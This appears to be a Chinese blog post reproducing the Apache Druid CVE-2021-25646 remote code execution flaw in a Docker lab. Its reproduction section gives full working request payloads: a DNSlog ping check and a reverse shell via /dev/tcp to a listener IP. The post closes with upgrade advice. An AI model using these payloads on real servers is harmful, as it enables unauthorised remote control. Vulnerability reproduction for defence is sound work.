Apache druid未授权命令执行漏洞复现(CVE-2021-25646)
1.简介
Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。
2.漏洞概述
- 编号:CVE-2021-25646(严重)
Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。
3.影响版本
- Apache Druid < 0.20.1
4.环境搭建
ubuntu
1.安装docker
apt install docker.io
2.搭建漏洞环境
docker run -d -p 8081:8888 fokkodriesprong/docker-druid
5.漏洞复现
- 我的ip为:121.36.200.207
- 访问:http://121.36.200.207:8081
点击Load data
点击Local disk
右侧
Base directory填入:quickstart/tutorial/
File filter填入:wikiticker-2015-09-12-sampled.json.gz
点击preview,burp抓包
DNSlog
首先获取dnslog地址,
把请求正文改成以下正文,把yt1biq.dnslog.cn地址替换成自己获取的地址:
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping yt1biq.dnslog.cn')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
反弹shell
把请求正文改成以下正文,注意要改成自己的监听ip和端口:
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/121.36.200.207/1234 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
成功反弹shell
6.修复方式
- 升级Apache Druid 到最新的版本
- 对Apache Druid进行权限控制,只允许受信任的主机访问集群服务器
建议及时更新Apache Druid,下载链接为: - https://druid.apache.org/downloads.html
- https://github.com/apache/druid/releases/tag/druid-0.20.1
欢迎大家评论交流